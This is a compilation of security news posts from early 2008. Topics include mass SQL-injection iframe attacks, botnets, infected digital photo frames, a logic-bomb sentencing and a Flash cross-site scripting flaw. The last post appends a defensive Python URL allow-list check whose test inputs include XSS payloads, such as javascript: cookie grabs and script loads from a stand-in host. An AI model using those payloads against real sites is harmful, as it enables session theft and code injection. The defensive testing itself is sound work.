Security needs driving multi-layered approach

The need for higher levels of security is pushing organisations towards multi-layered products that offer access control, video surveillance and other security devices in a single platform.

Open communications protocols, networks and faster computers have led to the diversification of IP networks to newer areas of the organisation, according to Archana Umesh Rao, a research analyst at Frost & Sullivan.

As a result, interoperability is being extended to other applications such as security.

The research revealed that, as the security industry moves from analogue to digital to IP, vendors and customers are looking to create more secure environments by integrating services rather than using isolated security products.

Corporate security services such as video surveillance, access control and fraud detection are increasingly database-driven and network-delivered, leading to IP becoming more tightly tied in with physical security.

Combined services can have other benefits such as preventing hackers from accessing corporate networks internally by slipping through security gates behind genuine employees.

However, the research also found that implementation has been sluggish owing to low end-user awareness about the benefits of integrating disparate security products.

The use of integrated systems has also been restricted to high-end applications because of the high cost of network infrastructure and integration software.

"The convergence of physical security with IP involves a complex amalgamation of security and networking technology," explained Rao.

"In this context, superior customer service and technical support will be crucial to gaining a competitive advantage in the market."

The report concludes that user education about the benefits and return on investment of security integration should be the key focus for industry participants in order to drive adoption.

FBI Wiretap Cut Off After Feds Fail To Pay Telecom Spying Bills

The FBI routinely failed to pay telecom companies promptly for providing phone and internet lines to the FBI's impressive domestic surveillance architecture -- resulting in at least one phone company cutting off a foreign intelligence wiretap until the FBI paid its bill, according to an audit released Thursday.

The Justice Department's Inspector General also found that telecom charges and invoices for surveillance overwhelmed the FBI's ability to keep track of its bills, and that one field office got a $66,000 bill from a carrier for unpaid surveillance work.

Some of the problems stemmed from telecoms billing multiple times for individual surveillance warrants -- which, in the case of Cox Communications, costs $1500 for a 30-day wiretap order. But telecoms also bill the FBI for internet connections and phone lines that connect the carrier's wiretap-friendly switches with the FBI's wiretap software system known as the Digital Collection System.

Former FBI agent and now ACLU national security policy counsel Mike German directed his ire at the telecoms, who happily played along with the government's warrantless spying and let the FBI illegally obtain customer records on requests for surveillance today backed by false promises to follow up with a court order tomorrow.

"To put it bluntly it sounds as though the telecoms believe it when FBI says warrant is in the mail but not when they say the check is in the mail," German said.

Each field office has wiretap recording computers that are meshed together with all the other field offices and HQ through a secure fiber optic network operated by Sprint.

The Inspector General found that the FBI was often confused about whether to use confidential case funds or general HQ money to pay the telecoms, and was even so confused that when telecoms issued refunds, it sometimes sent the refunds back to the carriers.

In 2006, DCS 5000, the FBI's national security wiretapping software, captured 27,728,675 communication sessions, according to released FBI documents, but the documents do not define what a "session" consists of. That year the FBI reported winning 2,176 FISA, or Foreign Intelligence Surveillance Act, warrants from a secret court.

To learn more about the FBI's wiretap network and software, start with "Point, Click ... Eavesdrop: How the FBI Wiretap Net Operates" and find out even more -- including details on the FBI's cell phone tracking vans -- in "FBI E-Mail Shows Rift Over Warrantless Phone Records Grab."

U.S. ranks near the bottom in 2007 International Privacy Ranking

The Electronic Privacy Information Center and Privacy International have just published their 1,000-page "Privacy and Human Rights Report," which assesses the state of surveillance and privacy protection in 70 countries.

Following are the key findings from the report. Needless to say, privacy is eroding in most parts of the planet. The lowest ranking countries included Malaysia, Russia and China, while Greece, Romania and Canada had the highest rankings in this year’s report. The U.S. was graded poorly, as an “endemic surveillance society.”

  • The 2007 rankings indicate an overall worsening of privacy protection across the world, reflecting an increase in surveillance and a declining performance of privacy safeguards.
  • Concern over immigration and border control dominated the world agenda in 2007.
  • Countries have moved swiftly to implement database, identity and fingerprinting systems, often without regard to the privacy implications for their own citizens.
  • The 2007 rankings show an increasing trend amongst governments to archive data on the geographic, communications and financial records of all their citizens and residents. This trend leads to the conclusion that all citizens, regardless of legal status, are under suspicion.
  • The privacy trends have been fueled by the emergence of a profitable surveillance industry dominated by global IT companies and the creation of numerous international treaties that frequently operate outside judicial or democratic processes.
  • Despite political shifts in the US Congress, surveillance initiatives in the US continue to expand, affecting visitors and citizens alike.
  • Surveillance initiatives initiated by Brussels have caused a substantial decline in privacy across Europe, eroding protections even in those countries that have shown a traditionally high regard for privacy.
  • The privacy performance of older democracies in Europe is generally failing, while the performance of newer democracies is becoming generally stronger.
  • The lowest ranking countries in the survey continue to be Malaysia, Russia and China.
  • The highest-ranking countries in 2007 are Greece, Romania and Canada.
    The 2006 leader, Germany, slipped significantly in the 2007 rankings, dropping from 1st to 7th place behind Portugal and Slovenia.
  • In terms of statutory protections and privacy enforcement, the US is the worst ranking country in the democratic world.
  • In terms of overall privacy protection the United States has performed very poorly, being out-ranked by both India and the Philippines and falling into the “black” category, denoting endemic surveillance.
  • The worst ranking EU country is the United Kingdom, which again fell into the “black” category along with Russia and Singapore. However for the first time Scotland has been given its own ranking score and performed significantly better than England & Wales.
  • Argentina scored higher than 18 of the 27 EU countries.
  • Australia ranks higher than Slovakia but lower than South Africa and New Zealand.

SQL attack continues to infect Web sites

A Web attack that compromises vulnerable Web pages and installs a snippet of code to redirect visitors to a malicious site in China continued to spread this week, according to security experts.

The attack, which started at the end of December and was first mentioned on Chinese sites, infects Web sites running Microsoft's Internet Information Server Web software and MS SQL database software, according to the Internet Storm Center, a network-monitoring group run by the SANS Institute. Compromised sites are seeded with iframe code that redirects visitors to two sites in China, uc8010.com and ucmal.com, which attempt to execute a relatively old exploit for RealPlayer via JavaScript.

While the attack is "massive and ugly," according to independent security researcher Dancho Danchev, it has also been very successful. The number of Web pages apparently affected by the attack has continued to rise over the past week. A Google search for parts of the iframe code currently returns nearly 100,000 pages for each domain. While Google search results are not an accurate way to measure the spread of malicious software, they can be a good indicator of the trend of an attack.

Given the success in seeding the redirection code on legitimate Web servers, the use of an old RealPlayer exploit in the attack puzzled some security experts.

"It is weird," said Roger Thompson, chief research officer for antivirus maker AVG. "I think the simplest explanation is that they found a really good server side exploit, but didn't think the rest of the attack through."

The attack appears, in many ways, similar to last year's compromises that, among other victims, hit the Web site of Super Bowl venue Dolphin Stadium, adding an iframe redirect to sites hosting malicious code. This year, security firm Computer Associates was reportedly among the victims.

Both domains used in the attack are only a few weeks old. The uc8010.com domain was registered on December 28, and the ucmal.com domain was registered on December 21, according to the Whois database.

Geeks.com loses customer data in hack

Computer gadget site Geeks.com has been hacked, with the attackers suspected of stealing customer credit card details, phone numbers and e-mail addresses.

Reports say Geeks.com sent out a letter at the weekend to its customers, admitting that customer information, including names, addresses, telephone numbers, e-mail addresses, credit card numbers, expiration dates, and card verification numbers, may have fallen into the wrong hands.

The website displays a banner from McAfee's ScanAlert service certifying that it is a hacker-safe site.

Calum Macleod, European director at security firm Cyber-Ark, said, "Quite apart from the fact that a supposedly secure website - and one that has been certified as such - has been hacked, it highlights the need for all commercial organisations to encrypt their customer data, if they are not to lose face or even face lawsuits from disgruntled customers."

Android hacked into hardware

HARDWARE hackers have been having fun attempting to put Google's Java-based Android software stack onto different hardware.

Linux Devices has been cruising around the hackers' various blogs and forum posts to see how they have been getting on.

It seems that while the software ships with an emulator based on Qemu, hardware might be a better target for application development.

Atmark-Techno's Armadillo-50, a development board based on Freescale's i.MX31L mobile applications processor, has been hacked to run the Android stack.

A software development outsourcing lab in Budapest known as "Eu.Edge" published an outline of booting Android on the Sharp SL-C760.

A Japanese user also managed to get the software running on a Sharp Zaurus C3000M and a Dutch Open Embedded Software Forum user named "cortez" posted links to an Android filesystem built to run alongside Poky Linux in a chrooted environment.

He installed Android on the SL-C3x00.

UK spooks deliberately leaked 'Squidgygate' tapes

The infamous "Squidgygate" tapes of Princess Diana speaking intimately with an alleged lover were recorded by the Government Communications Headquarters and deliberately leaked over the public airwaves, her former bodyguard told an inquest panel looking into her death.

The UK spy agency regularly bugged and taped Diana and other members of the royal family, according to Ken Warfe, who served as a bodyguard to the princess from 1987 to 1993. Ostensibly the reconnaissance was to protect the family from assassination by the Irish Republican Army.

A tape of a 1989 New Year's Eve conversation between Diana and James Gilbey contained a half-hour of pillow talk. Gilbey repeatedly told her, "I love you" and called her by the pet name "Squidgy" 53 times.

According to Warfe, the recording was made by the UK government's top secret monitoring station and then continuously broadcast until picked up by ham radio enthusiasts. The hams then turned the tapes over to the media. Warfe didn't say why the spooks wanted to make the conversations public.

The revelation came during an inquest into the August 1997 death of Diana, her boyfriend Dodi Fayed and driver Henri Paul in a high-speed car crash as they fled paparazzi in Paris.

It wasn't the only shocker let loose during the hearing.

Warfe said royal family members were jealous of Diana's popularity and that she believed private secretaries to the Queen and Duke of Edinburgh were "sharpening their knives" against her.

Because of her distrust of the royal family and of intelligence services, the princess in 1993 hired electronic surveillance experts to sweep her apartments at Kensington Palace for bugs. They posed as carpet fitters to avoid detection, Warfe said, but eventually four men were detained after they tried to access a telephone exchange.

The tender New Year's Eve exchange was recorded while Diana was staying with the Queen at Sandringham estate in Norfolk and Gilbey was at an undisclosed location speaking on a mobile phone.

After the conversation was recorded, it was broadcast on a loop until it was picked up by radio ham Cyril Reenan, who sold it to a newspaper. Reenan was said to have stumbled upon the conversation accidentally using a radio scanner.

Coverage from the Telegraph and the BBC is here and here, respectively.

Phishers now leasing the Storm worm botnet

A number of phishing sites have cropped up within the last day using domains previously attributed to the Storm worm botnet. Last fall, Storm was used in a series of pump-and-dump stock spam blasts, including a unique MP3-based spam blast, but researchers at F-Secure don't think the original authors of Storm are necessarily trying something new. F-Secure said Tuesday that "October brought evidence of Storm variations using unique security keys. The unique keys...allow the botnet to be segmented allowing 'space for rent.'" They think phishers are leasing parts of the larger botnet.

F-Secure cites a Halifax bank as one of the phishing targets, while Trend Micro identifies the Royal Bank of Scotland as another. What connects these sites are the server domains hosting the pages. Trend Micro said Tuesday it detected the hosts "while watching domain activity normally associated with suspected RBN (Russian Business Network) -associated activities."

The original Storm worm code, so named because it coincided with a severe winter storm in Europe, will celebrate its first anniversary next week, on or around January 19.

SoBig anniversary marks birth of the botnet

Wednesday (9 January) marks the fifth anniversary of the SoBig-A virus, an item of malware experts reckon marked the transition to money rather than mischief as the main drive behind malware creation.

While it wasn't until August 2003 that a variant of the malware (SoBig-F) caused disruption on a massive scale, the first iteration of the virus in January began what became a steady evolution in cybercrime. SoBig "irrevocably changed" the malware landscape by heralding the introduction of the botnet phenomenon, according to email security firm MessageLabs.

The SoBig worm in its various guises commonly appeared as an attachment to electronic messages with subject lines such as "Re: Approved", "Thank you!", or "Re: That movie". The body of the email messages contained text such as "See the attached file for details", designed to tempt prospective marks into opening infectious .pif or screensaver files. The rudimentary social engineering technique was then new but didn't really take off until a sequel of the worm was released some months after the first variant of the malware hit the net.

The driving force behind all variants of SoBig was to distribute self-replicating Trojans which created botnets of compromised zombie PCs, useful for the distribution of spam or other nefarious purposes. Following the introduction of anti-spam legislation in 2003, botnets provided the anonymity that spammers required, and the increasing penetration of always-on home broadband networks made them increasingly effective as a distribution tool. The increasing ineffectiveness of older techniques - such as open mail relays - in the face of evolving spam filtering technologies helped further fuel the transition to a new cybercrime economy based on trade in compromised PCs and hacker tools.

Five years on, the malware landscape has become even more sophisticated. Recent months have seen the evolution of the Storm worm Trojan and other sophisticated "professionally developed" botnet clients, such as Nugache, a new malware strain that can be controlled without use of a command and control server.

Malware hitches a ride on digital devices

It's time to add digital picture frames to the group of consumer products that could carry computer viruses and Trojan horse programs.

In the past month, at least three consumers have reported that photo frames -- small flat-panel displays for displaying digital images -- received over the holidays attempted to install malicious code on their computer systems, according to the Internet Storm Center, a network-threat monitoring group. Each case involved the same product and the same chain of stores, suggesting that the electronic systems were infected at the factory or somewhere during shipping, said Marcus Sachs, who volunteers as the director of the Internet Storm Center.

"When (the first incident) popped up, we thought it might be someone that was infected and blamed it on the digital picture frame," Sachs said. "But this is malware -- and malware that does not seem to be very well detected. You could plug in a device and infect yourself with something that you would never know you had."

The incidents underscore that the proliferation of electronic devices with onboard memory means that consumers have to increasingly be aware of the danger of unwanted code hitching a ride. While many consumers are already wary of certain devices, such as digital music players, USB memory sticks and external hard drives, that include onboard memory, other types of electronics have largely escaped scrutiny.

In the past, consumer devices infected with malicious code have generally been the result of manufacturing mishaps. In October 2007, for example, hard-disk drive maker Seagate acknowledged that a password-stealing Trojan horse program had infected a number of its disk drives shipped from a factory in China after a computer at the manufacturing facility was infected. The Trojan horse would infect systems and attempt to steal the account credentials to Chinese online games as well as the popular World of Warcraft.

In another incident, a Windows computer virus snuck onto the hard drives of a limited number of Apple's iPods during manufacturing in 2006.

Going forward, infections may no longer always be accidental, said Sachs, who is also the executive director of government affairs at telecommunications provider Verizon.

"I think that supply-side attacks are going to go from zero to some small percentage," he said. "It is obviously not going to be as dangerous as mass mailing e-mail infections, but you could have some really clever targeted attacks."

In the latest incidents, three photo frames made by Tuscaloosa, Ala.-based Advanced Design Systems, and bought from different Sam's Club stores, each contained a Trojan horse, according to reports to the SANS Internet Storm Center. The malicious code appears to act like a rootkit, hiding itself and disabling access to antivirus resources.

"It propagates to any connected device by copying a script, a com file and an autorun file," one consumer reported to the ISC. "It hides all systems files and itself while completely eliminating the user admin ability to show hidden files. It creates processes that negate any attempt to go to anti virus and anti spam web sites. It prevents the remote installation of any antivirus components."

Advanced Design Systems did not immediately respond to requests for comment sent by e-mail and left on its voicemail system on Tuesday. A media representative of Wal-Mart, which owns the Sam's Club discount warehouse chain, could not comment on the issue when contacted Monday and did not provide a comment in time for publication.

Keeping malicious code off of consumer products is a serious issue, said Larry Landry, a software expert and digital-picture frame expert at Eastman Kodak. Landry was frank about the chances of any manufacturer eliminating the risk of accidental infection: A company cannot rule out an infection in the factory, but it can make the probability of such an incident very unlikely, he said.

"Kodak works very closely with our suppliers to see that they have the latest version of antivirus software on the manufacturing systems," Landry said. "We also ask that any PCs in the factory are not connected to the Internet."

Kodak is not among the manufacturers whose products were allegedly compromised by the Trojan horse program.

Following the report of an infected digital photo frame on Christmas Day, the Internet Storm Center called for more information and turned a single incident into a steady drip, if not a flood, of anecdotes from consumers. Other devices that reportedly came with viral hitchhikers included hard drives, MP3 players and music-playing sunglasses.

While a compromise at the manufacturer is the most likely scenario, ISC's Sachs also pointed to retailers as a possible point of infection. Returned products, which could have been infected by the consumer, are frequently put back on the shelf if they are in saleable condition, and attackers could take advantage of a store's poor digital hygiene, he said.

"Trying to (infect a product) all the way back at the factory -- getting it through all the checks and balances -- would be pretty hard to do," he said. "But doing it at the store, where there might be loose return policies, and (where) they put it back on the shelf -- you are not going to get a million infections, but you might get a person from an investment bank next door."

Yet, among the major threats to consumers' PCs and data, infection by a consumer product is a relatively minor one, said Mikko Hyppönen, chief research officer for antivirus firm F-Secure, adding: "It'll happen."

Consumers will have to be careful with any device that can be connected to a PC, including USB thumb drives, GPS devices, mobile phones, video players, set top boxes, portable hard drives, memory card readers, and eventually even microwave ovens and other appliances, he said.

Wal-Mart, the owner of Sam's Club, told the ISC that its security team had randomly checked several dozen picture frames and did not find additional infections, Sachs said. A representative of Wal-Mart reached by SecurityFocus could not immediately comment on the issue.

The malware 'shadow economy'

Viruses, malware and online crime are evolving from the realm of geeks into a major shadow economy that closely mimics the real world.

Maksym Schipka, a senior architect at security firm MessageLabs, claims to have identified a sophisticated online black market with tens of thousands of participants.

This underground internet economy is worth over $105bn, making it bigger than the global drugs trade.

Collectively, online criminals are using the techniques of the free market to subvert and corrupt legitimate online business.

In his report Schipka lays out the basic workings of this system, comparing it to a normal high street experience.

As with high street stores, online crime breaks down into a series of specialised trades.

Malware writers first create new viruses, spyware, and Trojans to infect computers, but the majority do not distribute the code themselves.

In fact, they make great play of offering their software 'for educational purposes only' in the hope that this provides some immunity from prosecution.

The malware writers then sell this code for as little as $250 and customers can subscribe to updates for an extra $25 a month which ensures that the malware evades detection.

The middleman who buys malware from a programmer then typically uses the services of a botnet owner to spread it.

Once the malware has spread, the middleman can sit back and start to collect stolen information and stolen identities which are then sold on to make money.

According to Schipka's research, a full identity sells for around $5. This includes name and address, a passport or driving licence scan, credit card numbers and bank account details.

Credit card numbers sell for between two and five per cent of the remaining credit balance on the cards in question.

As competition is stiff, identity thieves offer customers a high level of service. For example, people can buy identities sorted by a given country, industry, role or credit card sorted by remaining balance.

There are a range of other services offered within the shadow economy, including a system of guarantors and escrow accounts to help thieves make sure they are not ripped off themselves.

Another sign of growing sophistication is the continuous improvement in the quality of products on sale in the shadow economy.

Malware writers will offer guarantees that a given virus or Trojan will not be detected using current antivirus programs, and the malware author will supply a new version if vendors update their software.

The shadow economy has all the attributes of a traditional economy - division of labour, price competition, marketing etc - but accelerated to internet speed and carried out online.

Schipka warned that, while it is interesting to observe these classic economic principles at work, it suggests that malware is going to get more common and more virulent.

The researcher explained that many conventional antivirus programs rely on 'signatures' to detect malware and update their signature files as new malware comes to light.

However, this means that a signature can only be created after a new virus is in the wild and is attacking computers. Worse, malware authors can also download the signatures and test their creations against the latest updates.

Schipka's research suggests that malware authors can produce new unique malware every 45 seconds in order to keep it undetected.

With this in mind, Schipka recommends that security program developers use a combined signature-based and heuristic scanner to help maximise the strength of their products.

Zango strikes back over reported Facebook hack

Officials with Zango, a maker of Web-based advertising software, are aggressively refuting last week's report from security device maker Fortinet which claimed that the adware firm's programs were being secretly passed along to end users by an application made available on Facebook.

Tabbed by Fortinet as the first major malware/greyware/badware hack to find its way onto the social networking portal, the Secret Crush Facebook widget was the subject of a statement Zango leaders released late Monday calling claims of the company's involvement "blatantly untrue."

As reported in my original story, and based on my interview with Guillaume Lovet, a regional manager of Fortinet's Threat Response Team, the initial claim made by the security company appeared to be that the Secret Crush program -- marketed to Facebook users under the guise of a tool that allowed them to find out about other members who found them attractive -- secretly installed Zango adware.

Upon further review, that appears at least in part to have been a mistake in interpretation of the bulletin and Mr. Lovet's observations on my part.

In the end, Fortinet is charging that Secret Crush merely "directed [users] to an external Web site inviting them to download applications such as MyWebSearch, which allows for pop-up advertising," to quote Chris Boyd, aka PaperGhost, who also blogged on the confusion last night.

To that end, Zango representatives said that once a user was sent to the aforementioned Web site after downloading Secret Crush, they were presented with a legitimate end user licensing agreement that informed them of all of the intricacies of its adware programs.

According to Zango:

"What the Fortinet report writer saw was simply an ad for a Zango application after the widget was added to a Facebook profile – an ad not connected to the widget and not unlike any other ad on the Internet that might appear on a Web page. The Zango advertisement, seen by Fortinet's researcher but not by Zango's security team at any point during the subsequent investigation, was just one in a series of rotating advertisements that a user might see after installing the Secret Crush application. If clicked on, the ad led users to Zango's standard notice and consent process."

The party that could really shed light on this whole confusing situation is Facebook itself, but they've yet to return any of my calls or e-mails on the matter. Social networking they appear to do well; PR, not so well.

Meanwhile, Fortinet is sticking to its original report:

"After additional investigation, Fortinet confirms that our research related to the 'Secret Crush' (Facebook Widget) was accurate as of posting our advisory on January 2, 2008," the company said in a statement on Tuesday. "The behavior shown in our screen shots simply showcases the observations the FortiGuard Global Security Research Team made on that date. We stand behind our original research."

So, it's a classic game of he said, she said, but, as with PaperGhost's assessments (and he has doggedly pursued Zango for its questionable practices in the past), it does seem based on the reported details that Zango at least served up its EULA before allowing end users to click through and grab its programs, which is all it is required to do really.

I still think that Facebook should do a better job of policing the apps that get loaded onto its site, and that Zango needs to be as transparent as possible if it is serious about changing its image from a shady adware firm to a legitimate ethical business, as its media representatives claim that it has.

But, we in the security community who picked up on this story so eagerly should also be reminded to look into all the details of any security bulletin before we report on it.

Sorry for any confusion.

Facebook finally got back to me on Wednesday, and while they can't dig up anyone to talk about this whole issue of security and social networking (which is pretty surprising since it's a huge question mark before they launch Facebook Enterprise) here's the boilerplate statement they passed along:

"Facebook is committed to user safety and security and, to that end, its terms of service for developers explicitly state that applications should not use adware and spyware. Users should employ the same precautions while downloading software from Facebook applications that they use when downloading software on their desktop. We have contacted the developers and have disabled the Secret Crush application for violating Facebook Platform Terms of Service."

So, despite Zango's claims, it would seem that Facebook agreed with Fortinet that there was an element of adware involved that they felt violated their rules.

Posted in | 0 comments

Man gets record sentence for computer sabotage

A computer systems administrator was sentenced to 30 months in prison on Tuesday for trying to sabotage his company's servers out of fear he was about to lose his job, prosecutors said.

The U.S. Attorney's Office in Newark, N.J., said Yung-Hsun Lin received the longest ever federal prison term for a criminal attempt to damage a computer system.

He was also ordered to pay $81,200 in restitution to his former employer, pharmacy benefit manager Medco Health Solutions.

Lin, 51, admitted he modified existing code and added a "logic bomb" designed to wipe out servers on Medco's network in October 2003, around the time Medco was being spun off by Merck, authorities said.

Lin feared he might be affected by the resulting layoffs. The code was scripted to launch the attack on his birthday, but it failed, they said.

Medco servers contained software applications relating to clients' clinical analyses, rebates, billing, and managed care processing. The unauthorized code was found by another computer administrator in January 2005, authorities said.

Posted in | 0 comments

SQL Injection Attacks Hit 70,000 Websites

Automated attacks spread across government and education environments as well as commercial sites



JANUARY 8, 2008 | An automated SQL injection attack has caused as many as 70,000 Websites to steer users toward malicious code over the last few days, according to researchers.

The attack adds a JavaScript tag to every piece of text in a Website's SQL database, the researchers said. The tag instructs any browser that reaches the site to execute the script hosted on the malicious server.

The automated attack hit a broad range of Websites, researchers said. "This was a pretty good mass-hack," said Roger Thompson, a researcher at Exploit Prevention Labs -- now a part of Grisoft -- in his blog. "It wasn't just that they got into a server farm, as the victims were quite diverse, with presumably the only common point being whatever vulnerability they all shared."

The SANS Institute's Internet Storm Center said the attack hit government and educational institutions as well as commercial sites. The SQL injection attack may also have played a part in the security problems experienced by Computer Associates over the weekend, SANS said.

Ironically, the client-side exploit the attack delivered targeted an old vulnerability, and the injected script has been relatively easy to clean up, Thompson said.

"The only exploit we were able to [discover] was the venerable MS06-014 (MDAC) patched in September 2006," Thompson said. "What this means is that [the attackers] went to the trouble of preparing a good Website exploit, and a good mass-hack, but then used a mouldy [sic] old client exploit. It's almost a dichotomy."

Posted in | 0 comments

Microsoft closes a critical network flaw

Microsoft kicked off the new year by fixing three vulnerabilities on its first regularly scheduled patch day.

The most serious flaw affects the way Windows stores data associated with Internet Group Management Protocol (IGMP) and Multicast Listener Discovery (MLD) network requests. The vulnerability affects both Windows Vista and Windows XP Service Pack 2 and is rated Critical by Microsoft for those operating systems. An attacker could take control of a user's machine by sending it a specially crafted IGMP or MLD request, Microsoft stated in its bulletin.

"An attacker who successfully exploited this vulnerability could take complete control of an affected system, ... (and) could then install programs; view, change, or delete data; or create new accounts with full user rights," Microsoft stated.

The company also fixed a problem in the way that Windows handles Internet Control Message Protocol (ICMP) requests, which could be exploited in a denial-of-service attack. Because the vulnerable component is not active by default, the software giant rated the flaw as Moderate, its third highest severity rating for software flaws. The third vulnerability -- in the Windows Local Security Authority Subsystem Service (LSASS) -- could allow an attacker to gain complete control of a system, provided the attacker already has valid log-on credentials.

In 2007, Microsoft issued a total of 69 bulletins. On Tuesday, the software giant had not yet updated its Security Vulnerability Research & Defense blog, which it launched last month, with technical details of the flaws.

Posted in | 0 comments

German hackers fight electronic voting

Veteran German hacking group the Chaos Computer Club is fighting the use of electronic voting machines in upcoming local elections.

A lawsuit filed by the group against the German state of Hesse seeks a temporary injunction against the use of electronic voting machines that would prevent their use in 27 January local elections. The legal action contends that NEDAP voting computers due to be used in the count in eight districts are insecure and "susceptible to manipulation".


"Recourse to the court has become necessary since the Hesse state government evidently does not have the required expert knowledge to understand the technical security and transparency flaws of the voting machines, nor the will to act accordingly," the Chaos Computer Club explains.

Additional security measures added by the Hesse Ministry of the Interior to address concerns about the integrity of votes tallied using NEDAP voting computers are insufficient, the hackers argue. 45,000 people have signed its petition to reject e-voting machines.

Chaos Computer Club's legal offensive follows a successful campaign by Dutch hackers to ban the same type of NEDAP voting machines in the Netherlands. A Dutch judge last year ruled the use of 9,000 Nedap e-voting machines in recent Dutch elections unlawful because of a lack of adequate authorisation. Results compiled using the machines were, however, allowed to stand. The decision was hailed as a victory for the Dutch "we don't trust voting computers" foundation.

Posted in | 0 comments

Clarkson eats words over lost data

TV presenter Jeremy Clarkson has been forced to eat his own words after thieves hacked into his bank account.

Clarkson said in a newspaper column that the data lost by staff at HM Revenue & Customs was useless, and published his own bank details in the article to prove his point.

However, he was forced to apologise publicly after £500 was quickly removed from his account.

Clarkson gave his account number and sort code and hinted at his address. This was enough for him to lose the money.

"I opened my bank statement this morning to find out that someone has set up a direct debit which automatically takes £500 from my account," he wrote in a Sunday Times article.

"The bank cannot find out who did this because of the Data Protection Act and they cannot stop it happening again. I was wrong and I have been punished for my mistake."

The money went to a charity, Diabetes UK, which did not require a signature to set up a direct debit. Clarkson has now apologised and admitted that data loss is a serious issue.

"Contrary to what I said at the time, we must go after the idiots who lost the discs and stick cocktail sticks in their eyes until they beg for mercy," he said.

Posted in | 0 comments

Hackers turn Cleveland into malware server

Tens of thousands of websites belonging to Fortune 500 corporations, state government agencies and schools have been infected with malicious code that attempts to engage in click fraud and steal online game credentials from people who visit them, security researchers say.

At time of writing, more than 94,000 URLs had been infected by the fast-moving exploit, which redirects users to the uc8010-dot-com domain, according to a Google search for the domain. Security company Computer Associates was infected at one point, as were sites belonging to the state of Virginia, the city of Cleveland and Boston University.

"This is a wide variety of sites that have been impacted," said Mary Landesman, a researcher for ScanSafe, a company that provides real-time information to clients about malicious sites. "It's a real in-your-face example of what we see everyday. It's really time for companies that have a vested interest in a web presence to take a hard look at what their security posture is."

Malicious hackers were able to breach the sites by exploiting un-patched SQL injection vulnerabilities on the servers, according to Johannes Ullrich, CTO for the SANS Internet Storm Center. The injections included JavaScript that redirected end users to the rogue site, which then attempted to exploit multiple vulnerabilities to install key-logging software that stole passwords for various online games, he and other researchers said.

In many respects, the attack resembles one that took place early last year on websites belonging to the Miami Dolphins football team just in time for the Super Bowl. Miscreants behind that attack exploited a bug in the content creation tool Dreamweaver, which left much of the code on the website vulnerable to SQL injection. The attackers, who over the past year have struck other sites, were able to exploit the vulnerabilities using scripts that scour servers for the buggy code.

Ullrich said he was unsure where the vulnerability lies in the latest round of attacks.

Visiting uc8010-dot-com set off a chain of redirections that tried to use already-patched vulnerabilities to install key-logging software. Ullrich said he observed the sites using an old RealPlayer vulnerability. Roger Thompson of Exploit Prevention Labs said end users were also served an exploit for a Windows vulnerability Microsoft patched in 2006.

According to Landesman, the exploits forced end users to visit sites that pay third parties a fee in exchange for sending them traffic. She speculates the attackers signed up as affiliates of the sites and then profited each time an end user was infected. The malware also installed keyloggers on end user machines that stole passwords to various online games, Ullrich said.

He said the uc8010-dot-com domain (we don't recommend readers visit the site) was registered in late December through a China-based registrar, indicating the attackers were fluent in Chinese.

As we've said before, end users should make sure browsers, browser plug-ins, media software and other applications are updated. Secunia's Software Inspector is one good way to do this. Also helpful is the use of the Firefox browser with the NoScript plug-in, which protects users against many JavaScript-based attacks.

Posted in | 0 comments

T-BOT NoDC Client Version 1.140 CRACKED


Posted in | 0 comments

Web tools create XSS headaches

Adobe Flash files created by a number of Web authoring platforms could be co-opted by an online fraudster to conduct a cross-site scripting attack, security researchers stated last week.

A paper authored by Google security researcher Richard Canning found that the Flash files created by at least five Web site authoring systems, including Adobe Dreamweaver and InfoSoft FusionCharts, could be used to bypass anti-phishing measures. By creating a link that passes JavaScript code to the Flash files, an attacker can cause a victim to run malicious code in the security context of a potentially trusted Web server, Canning stated in a summary of his findings.

While pinpointing which sites are running vulnerable Flash files is difficult, hundreds of thousands of Web sites could be affected, Web security researcher Jeremiah Grossman wrote on his blog this weekend.

"Because this issue is NOT a universal XSS, as was the case with the Adobe PDF bug, issues are going to be harder to track down," wrote Grossman, who is the chief technology officer for WhiteHat Security. "We're going to have to figure out ways to decompile [or] reverse engineer Flash files to determine what authoring tool was used and update our vulnerability scanners so that Flash files can be tested in much the same ways as a web application."

The issue is separate from a vulnerability in Flash files that Adobe fixed last month, the researchers said. Adobe issued a patch in December to fix ten critical vulnerabilities in its Flash software, among them modifications to eliminate cross-site scripting attacks using the asfunction() and navigateToURL() functions. On December 24, InfoSoft fixed its cross-site scripting issue by allowing only the loading of relative URLs, not absolute URLs.
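The InfoSoft fix described above, accepting only relative URLs, is a small allow-list check whose value lies entirely in the inputs it rejects. The Python below is an added example, not the InfoSoft patch or the research code the article cites; it reconstructs that policy and lists the inputs such a check must refuse: javascript: with case changes or embedded control characters, Flash's own asfunction: pseudo-scheme, protocol-relative and backslash-prefixed URLs, and data: URLs. The host malicious.example and all sample inputs are constructed.

```python
"""Allow-list check for a URL that a Flash movie (or any client-side component)
will navigate to: only a same-origin relative path passes. Added example, not the
InfoSoft patch or the research code the article cites. Sample inputs are constructed."""
import re
from urllib.parse import urlsplit

# Browsers (and the Flash player) ignore ASCII control characters and whitespace
# when deciding on a scheme, so "java\tscript:" still runs as javascript:.
_CONTROL_OR_SPACE = re.compile(r"[\x00-\x20\x7f]")


def is_safe_relative_url(raw):
    """True only for a relative path with no scheme and no authority component.
    Deliberately conservative: anything with a colon in the first segment (a
    scheme, a drive letter, host:port) is refused rather than special-cased."""
    if not isinstance(raw, str):
        return False
    url = _CONTROL_OR_SPACE.sub("", raw)
    if not url:
        return False
    # Backslashes are treated as forward slashes by browsers, so "\\evil.example"
    # is really the protocol-relative URL "//evil.example".
    url = url.replace("\\", "/")
    if url.startswith("//"):
        return False
    parts = urlsplit(url)
    # Any scheme at all is rejected: http:, javascript:, vbscript:, data: and
    # asfunction: all either carry code or leave the origin.
    return parts.scheme == "" and parts.netloc == ""


# Constructed inputs paired with the verdict a correct check must give.
SAMPLE_INPUTS = {
    "/charts/data.xml": True,
    "data.xml?year=2007": True,
    "../reports/q4.xml": True,
    "http://malicious.example/x.js": False,
    "javascript:alert(document.cookie)": False,
    "JaVaScRiPt:alert(1)": False,
    "java\tscript:alert(1)": False,
    " javascript:alert(1)": False,
    "asfunction:getURL,javascript:alert(1)": False,
    "//malicious.example/x.js": False,
    "\\\\malicious.example/x.js": False,
    "data:text/html,<script>alert(1)</script>": False,
    "": False,
}


def run_samples():
    """Return the inputs whose verdict disagrees with the expectation (ideally none)."""
    return [u for u, expected in SAMPLE_INPUTS.items()
            if is_safe_relative_url(u) != expected]


if __name__ == "__main__":
    print("mismatches:", run_samples())
```

The check is applied to the request parameter before it reaches the Flash file or a redirect; it decides acceptance only and does not try to sanitise a rejected value into an acceptable one.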

